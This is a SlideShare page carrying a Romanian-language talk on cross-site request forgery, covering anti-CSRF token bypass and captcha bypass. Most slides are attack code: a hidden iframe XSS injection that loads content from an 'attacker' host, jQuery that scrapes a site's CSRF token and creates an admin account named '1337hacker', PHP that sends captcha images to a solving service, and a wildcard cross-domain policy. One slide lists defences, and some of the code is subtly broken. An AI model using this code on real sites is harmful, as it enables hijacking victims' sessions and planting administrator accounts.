Cross Site Request Forgery Attacks

2,290 views
2,196 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,290
On SlideShare
0
From Embeds
0
Number of Embeds
1,276
Actions
Shares
0
Downloads
28
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Cross Site Request Forgery Attacks

  1. 1. Cross Site Request Forgery Attacks Security token bypass Captcha bypass Presented by Vlad Horatiu [email_address]
  2. 2. Ce este CSRF
  3. 3. Context <ul><li>Dispunem de: </li></ul><ul><ul><li>Acces la un web site pe care victima il poate frecventa </li></ul></ul><ul><ul><li>Cross Site Scripting (XSS) in domeniul in care victima avea privilegii superioare </li></ul></ul>
  4. 4. Principiul de baza <ul><li>Victima acceseaza site-ul in care avem acces </li></ul><ul><li>Prin intermediul javascript, victima trimite requesturi catre locatia in care are acces, prin intermediul XSS. </li></ul>
  5. 5. De ce avem nevoie de XSS? <ul><li>Browserele moderne permit requesturi AJAX, intrucat si accesul la sursa HTML a unei pagini, doar atata timp cat atat request-ul, cat si target-ul sau sunt pe acelasi domeniu. </li></ul><ul><li>Aceasta protectie restrictioneaza doar accesul la sursa unei pagini de pe alt domeniu, nu are niciun impact asupra accesarii sale (ex: iframe) </li></ul><ul><li>De ce? </li></ul><ul><ul><li>Securitate </li></ul></ul><ul><ul><li>Implicatii in web advertising </li></ul></ul><ul><ul><li>Securitate </li></ul></ul>
  6. 6. Initierea atacului <ul><li>Iframe din site-ul cu acces catre cel cu xss </li></ul><html> <iframe src=&quot;http://victimsite.com/index.php?xss=<script>document.write('<iframe src='http://attacker');</script>&quot; width=&quot;50&quot; height = &quot;50&quot; style=&quot;filter: alpha(opacity=0);-moz-opacity:0;opacity: .0;&quot;> </iframe> </html>
  7. 7. Login check function check() { $.get(&quot;login.html&quot;, function(data){ if(data.indexOf('blanaa') != -1) { var logged = tryToLogin(); } else { var logged = true; } }); }; function tryToLogin() { $.get(&quot;login.html&quot;, function(data){ $('#form_frame').contents().find('form').submit(); return (data.indexOf('blanaa') != -1); }); }
  8. 8. Token bypass <ul><li>URL atac CSRF clasic: </li></ul><ul><ul><li>http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned </li></ul></ul><ul><li>Link valid in cazul unei protectii token: </li></ul><ul><ul><li>http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned&token=693a93e07e1032751a2f14d00e33a56f </li></ul></ul><ul><li>Code snippets (PHP): </li></ul><ul><ul><li>Generare token: </li></ul></ul><ul><ul><ul><li>mysql_query(“INSERT INTO `user_tokens` (`user_id`, `user_token`) VALUES (‘”. Intval($uid) .”’, ‘”. sha1(mt_rand(1000000, 9999999).microtime(true)) .”)’); </li></ul></ul></ul><ul><ul><li>Validare token: </li></ul></ul><ul><ul><ul><li>$query = mysql_query(“SELECT `user_token` FROM `user_tokens` WHERE `id` = ‘”. Intval($uid) .”’ LIMIT 1”); </li></ul></ul></ul><ul><ul><ul><li>$token = getQueryToken($query); </li></ul></ul></ul><ul><ul><ul><li>if($_COOKIE[‘token’] != $token) </li></ul></ul></ul><ul><ul><ul><ul><li>Die(‘Esti un bulangiu!’); </li></ul></ul></ul></ul>
  9. 9. Token bypass <ul><li>Javascript token crawler </li></ul>function addAdmin() { $.get(&quot;http://victimsite.com/admin/add_user.php&quot;, function(data){ var token = getBetween('&token=', '&', data); alert(token); $.get(&quot;http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token&quot;+token, function(data){ }); }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }
  10. 10. Token bypass <ul><li>Javascript token crawler (POST) </li></ul>function addAdmin() { $.get(&quot;http://victimsite.com/admin/add_user.php&quot;, function(data){ var token = getBetween(&quot;type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;&quot;, &quot;&quot;&quot;, data); $.post(&quot;http://victimsite.com/admin/add_user.php&quot;, { user: &quot;1337hacker&quot;, pass: &quot;pwned&quot;, token: token }, function(data) {}) }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }
  11. 11. Token bypass <ul><li>Metode de prevenire </li></ul><ul><ul><li>Protectie impotriva atacurilor XSS </li></ul></ul><ul><ul><li>Cerere de captcha la operatiunile cu grad mare de risc </li></ul></ul><ul><ul><li>Cerere de parola la operatiunile cu grad mare de risc </li></ul></ul><ul><ul><li>Folosirea Private Browsing </li></ul></ul><ul><ul><li>Setarea sesiunilor cu o data de expirare relativ mica </li></ul></ul><ul><ul><li>Scrierea token-ului intr-un mod greu de parsat de catre script (exemplu: prin intermediul unui javascript obfuscat) </li></ul></ul>
  12. 12. Token bypass <ul><li>Dezavantaje </li></ul><ul><ul><li>Sensibil la schimbarile structurii HTML </li></ul></ul>
  13. 13. Flash Cross-domain policy <ul><li>Ne permite sa facem requesturi ajax intre doua domenii diferite </li></ul><ul><li>Domeniul destinatie trebuie sa aiba domeniul sursa intr-un “whitelist”: crossdomain.xml </li></ul><ul><li>Exemplu de crossdomain.xml: </li></ul><cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy>
  14. 14. Captcha bypass <ul><li>Context </li></ul><ul><ul><li>Userul are campurile username si password completate, datorita autocomplete </li></ul></ul><ul><ul><li>Formularul de logare cere captcha verification </li></ul></ul><ul><li>Principiul de baza </li></ul><ul><ul><li>Preluarea image path-ului prin javascript </li></ul></ul><ul><ul><li>Trimiterea imaginii catre un script de captcha breaking (prin intermediul crossdomain.xml) </li></ul></ul><ul><ul><li>Trimiterea informatiilor de logare </li></ul></ul>
  15. 15. Captcha bypass <ul><li>Captcha breaking script snippet: </li></ul>$rand = sha1(mt_rand(1000000, 9999999).microtime(true)); if(isset($_GET['path']))   file_put_contents($rand.'.jpg', file_get_contents($_GET['path'])); if ($captcha = $client->upload($rand.'.jpg')) {     echo &quot;CAPTCHA {$captcha['captcha']} uploadedn&quot;;     sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT);     if ($text = $client->get_text($captcha['captcha'])) {         echo $text;         } else {         $client->remove($captcha['captcha']);     echo '0';     } }
  16. 16. Captcha bypass <ul><li>Dezavantaje </li></ul><ul><ul><li>Timpul ridicat de rezolvare a captcha-ului </li></ul></ul><ul><ul><ul><li>Pentru ca metoda sa mearga, userul ar trebui sa ramana pe pagina cel putin un minut </li></ul></ul></ul><ul><ul><li>Costul ridicat al rezolvarilor captcha </li></ul></ul><ul><ul><li>Schimbarile in structura HTML </li></ul></ul><ul><ul><li>Necesitatea existentei Flash Player in sistemul victimei </li></ul></ul>
  17. 17. Exemple concrete <ul><li>Adaugare utilizatori intr-o platforma Wordpress </li></ul><ul><li>Adaugare user MySQL </li></ul>
  18. 18. Intrebari

×